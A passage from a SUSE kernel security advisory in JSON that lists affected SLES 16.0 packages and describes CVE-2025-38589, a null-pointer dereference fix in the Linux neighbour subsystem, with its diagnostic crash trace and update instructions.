"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38569"
},
{
"cve": "CVE-2025-38589",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38589"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nneighbour: Fix null-ptr-deref in neigh_flush_dev().\n\nkernel test robot reported null-ptr-deref in neigh_flush_dev(). [0]\n\nThe cited commit introduced per-netdev neighbour list and converted\nneigh_flush_dev() to use it instead of the global hash table.\n\nOne thing we missed is that neigh_table_clear() calls neigh_ifdown()\nwith NULL dev.\n\nLet\u0027s restore the hash table iteration.\n\nNote that IPv6 module is no longer unloadable, so neigh_table_clear()\nis called only when IPv6 fails to initialise, which is unlikely to\nhappen.\n\n[0]:\nIPv6: Attempt to unregister permanent protocol 136\nIPv6: Attempt to unregister permanent protocol 17\nOops: general protection fault, probably for non-canonical address 0xdffffc00000001a0: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000d00-0x0000000000000d07]\nCPU: 1 UID: 0 PID: 1 Comm: systemd Tainted: G T 6.12.0-rc6-01246-gf7f52738637f #1\nTainted: [T]=RANDSTRUCT\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:neigh_flush_dev.llvm.6395807810224103582+0x52/0x570\nCode: c1 e8 03 42 8a 04 38 84 c0 0f 85 15 05 00 00 31 c0 41 83 3e 0a 0f 94 c0 48 8d 1c c3 48 81 c3 f8 0c 00 00 48 89 d8 48 c1 e8 03 \u003c42\u003e 80 3c 38 00 74 08 48 89 df e8 f7 49 93 fe 4c 8b 3b 4d 85 ff 0f\nRSP: 0000:ffff88810026f408 EFLAGS: 00010206\nRAX: 00000000000001a0 RBX: 0000000000000d00 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffffc0631640\nRBP: ffff88810026f470 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000\nR13: ffffffffc0625250 R14: ffffffffc0631640 R15: dffffc0000000000\nFS: 00007f575cb83940(0000) GS:ffff8883aee00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f575db40008 CR3: 00000002bf936000 CR4: 00000000000406f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n __neigh_ifdown.llvm.6395807810224103582+0x44/0x390\n neigh_table_clear+0xb1/0x268\n ndisc_cleanup+0x21/0x38 [ipv6]\n init_module+0x2f5/0x468 [ipv6]\n do_one_initcall+0x1ba/0x628\n do_init_module+0x21a/0x530\n load_module+0x2550/0x2ea0\n __se_sys_finit_module+0x3d2/0x620\n __x64_sys_finit_module+0x76/0x88\n x64_sys_call+0x7ff/0xde8\n do_syscall_64+0xfb/0x1e8\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f575d6f2719\nCode: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d b7 06 0d 00 f7 d8 64 89 01 48\nRSP: 002b:00007fff82a2a268 EFLAGS: 00000246 ORIG_RAX: 0000000000000139\nRAX: ffffffffffffffda RBX: 0000557827b45310 RCX: 00007f575d6f2719\nRDX: 0000000000000000 RSI: 00007f575d584efd RDI: 0000000000000004\nRBP: 00007f575d584efd R08: 0000000000000000 R09: 0000557827b47b00\nR10: 0000000000000004 R11: 0000000000000246 R12: 0000000000020000\nR13: 0000000000000000 R14: 0000557827b470e0 R15: 00007f575dbb4270\n \u003c/TASK\u003e\nModules linked in: ipv6(+)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38589",
"url": "https://www.suse.com/security/cve/CVE-2025-38589"
},
{
"category": "external",
"summary": "SUSE Bug 1248366 for CVE-2025-38589",
"url": "https://bugzilla.suse.com/1248366"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
